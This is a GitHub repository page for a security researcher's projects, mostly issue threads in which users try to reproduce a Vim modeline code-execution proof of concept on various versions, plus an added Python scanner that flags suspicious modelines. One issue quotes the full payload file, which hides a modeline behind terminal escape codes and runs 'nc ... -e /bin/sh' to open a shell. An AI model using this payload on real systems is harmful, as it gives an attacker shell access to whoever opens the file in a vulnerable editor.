
security's Introduction

security

This repository will contain security-related stuff I'm doing. (Also, @rawsec on Twitter)

Recent:

More to come...


CTF write-ups:

My answers on Security.SE (many trivial, but also a few interesting ones).

Some older bugs:

security's People

Contributors

numirias, technologyclassroom


security's Issues

This vuln doesn't work for my system. Please check it

Hi,

I would like to confirm this poc with VIM version 8.0.1453, which is a vuln version,
but it doesn't work for me.
image

I set "modeline" to be activated in /etc/vim/vimrc (I tested with 2 things: set modeline, :set modeline)
screenshot

I checked with the command line "set modeline?"
modeline was activated properly...
image

and then I opened poc.txt with vim.
Nothing happened. Do you know what the problem is??
The test poc is like below
screenshot1


poc2 can't run properly on Ubuntu 18.04

I got this

cat shell.txt

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails('set\ fde=x\ \|\ source\!\ \%') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

vim shell.txt
"shell.txt" 1L, 264C
处理 modelines 时发生错误:
第 1 行:
E518: 未知的选项: \|\
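
A defensive check for files shaped like the `shell.txt` quoted above, as an added example that is not part of the original issue or of the repository: it flags modelines that assign an expression-valued option (such as the `fde=` seen in the quoted file) and lines carrying raw ESC bytes. The names `scan`, `EXPR_OPTIONS` and the sample inputs are constructed for illustration, and the modeline matching is a heuristic approximation of Vim's syntax.

```python
import re

# Vim options whose value is evaluated as an expression (long and short names).
EXPR_OPTIONS = {
    "foldexpr", "fde", "foldtext", "fdt", "formatexpr", "fex",
    "indentexpr", "inde", "includeexpr", "inex", "balloonexpr", "bexpr",
}
# Heuristic modeline marker: vi:, vim:, Vim:, vim<version>: or ex:,
# optionally followed by "se"/"set"; group 1 is the option text.
MARKER = re.compile(
    rb"(?:^|[ \t])(?:vi|[vV]im(?:[<=>]?\d+)?|ex):[ \t]*(?:set?[ \t]+)?(.*)")
# Options are separated by whitespace or ':' unless backslash-escaped.
SPLIT = re.compile(rb"(?<!\\)[ \t:]+")
# An assignment such as fde=..., fde+=..., fde^=..., fde-=...
ASSIGN = re.compile(rb"([a-z]+)[+^-]?=")


def scan(data: bytes, modelines: int = 5):
    """Return (line_number, finding) tuples for one file's bytes.

    Only the first and last `modelines` lines are checked for modelines,
    matching Vim's default 'modelines' value of 5; ESC bytes are reported
    wherever they occur.
    """
    lines = data.splitlines()
    n = len(lines)
    window = set(range(min(modelines, n))) | set(range(max(0, n - modelines), n))
    findings = []
    for i in sorted(window):
        m = MARKER.search(lines[i])
        if not m:
            continue
        for token in SPLIT.split(m.group(1)):
            opt = ASSIGN.match(token)
            if opt and opt.group(1).decode() in EXPR_OPTIONS:
                findings.append(
                    (i + 1, "modeline sets expression option " + opt.group(1).decode()))
    for i, line in enumerate(lines):
        if b"\x1b" in line:
            findings.append((i + 1, "raw ESC byte (terminal escape sequence)"))
    return findings


# Constructed sample inputs (not taken from the repository).
SAMPLE_SUSPICIOUS = b"Nothing here.\n# vim: set fen fdm=expr fde=Example() fdl=0:\n"
SAMPLE_ESCAPES = b"\x1b[?7lhidden\x1b[1G\x1b[Kvisible\n"
SAMPLE_BENIGN = b"#!/bin/sh\n# vim: set ts=4 sw=4 et:\necho hi\n"
```

A file that is flagged is worth opening with `vim -u NONE -c 'set nomodeline'` or inspecting with `cat -v` rather than plain `cat`, since the escape sequences can hide content in a terminal.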

Not working for Mac osx

Hi,

The modeline is by default enabled on Mac osx. However, both payloads stated in your advisory are not working for Mac with outdated Vim version. They work fine on Ubuntu OS. Is it possible that the implementation of Vim is different? Can you take a look at what happened?

can't reproduce on vim 8.1.0648-r1

Hello,

I'm trying the poc on vim 8.1.0648-r1 but it doesn't work.

I'm not using vim and have barely any knowledge of this editor, but here is what I have checked so far:

By default, :set modelines? shows nomodeline. I created a .vimrc with the following content:

set modelines=1
set modeline

and run like

vim -u .vimrc and

:set modelines? shows modeline. I saved the file poc.txt found in this repo and opened it with vim -u .vimrc poc.txt, but it didn't return a uname -a; instead it displayed the content of the file.

vim --version

VIM - Vi IMproved 8.1 (2018 May 18, compiled May 10 2019 13:57:46)
Included patches: 1-648
Modified by Gentoo-8.1.0648-r1
Compiled by portage@localhost
Tiny version without GUI. Features included (+) or not (-):
+acl -extra_search -mouse_sgr -tcl
-arabic -farsi -mouse_sysmouse -termguicolors
+autocmd -file_in_path -mouse_urxvt -terminal
-autochdir -find_in_path -mouse_xterm +terminfo
-autoservername -float -multi_byte -termresponse
-balloon_eval -folding -multi_lang -textobjects
-balloon_eval_term -footer -mzscheme -textprop
-browse +fork() -netbeans_intg -timers
+builtin_terms -gettext -num64 -title
-byte_offset -hangul_input -packages -toolbar
-channel -iconv -path_extra -user_commands
-cindent -insert_expand -perl -vartabs
-clientserver -job -persistent_undo +vertsplit
-clipboard -jumplist -printer -virtualedit
-cmdline_compl -keymap -profile +visual
-cmdline_hist -lambda -python -visualextra
-cmdline_info -langmap -python3 -viminfo
-comments -libcall -quickfix +vreplace
-conceal -linebreak -reltime +wildignore
-cryptv -lispindent -rightleft -wildmenu
-cscope +listcmds -ruby +windows
+cursorbind -localmap +scrollbind +writebackup
-cursorshape -lua -signs -X11
-dialog -menu -smartindent -xfontset
-diff -mksession -startuptime -xim
-digraphs -modify_fname -statusline -xpm
-dnd -mouse -sun_workshop -xsmp
-ebcdic -mouse_dec -syntax -xterm_clipboard
-emacs_tags -mouse_gpm +tag_binary -xterm_save
-eval -mouse_jsbterm -tag_old_static
+ex_extra -mouse_netterm -tag_any_white
system vimrc file: "/etc/vim/vimrc"
user vimrc file: "$HOME/.vimrc"
2nd user vimrc file: "~/.vim/vimrc"
user exrc file: "$HOME/.exrc"
defaults file: "$VIMRUNTIME/defaults.vim"
fall-back for $VIM: "/usr/share/vim"
Compilation: x86_64-gentoo-linux-musl-gcc -c -I. -Iproto -DHAVE_CONFIG_H -O2 -pipe -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1
Linking: x86_64-gentoo-linux-musl-gcc -Wl,-O1 -L/usr/local/lib -Wl,--as-needed -o vim -lm -lncurses -lelf

I suppose one of those features must be enabled in order to make the poc work, but I didn't find yet which one...

Thanks

How to construct poc on vim74?

Hi,

I realize that function assert_fails is added in version 8, does that mean vim74 is not affected by this vulnerability, or how could I construct poc on vim74?

Thanks
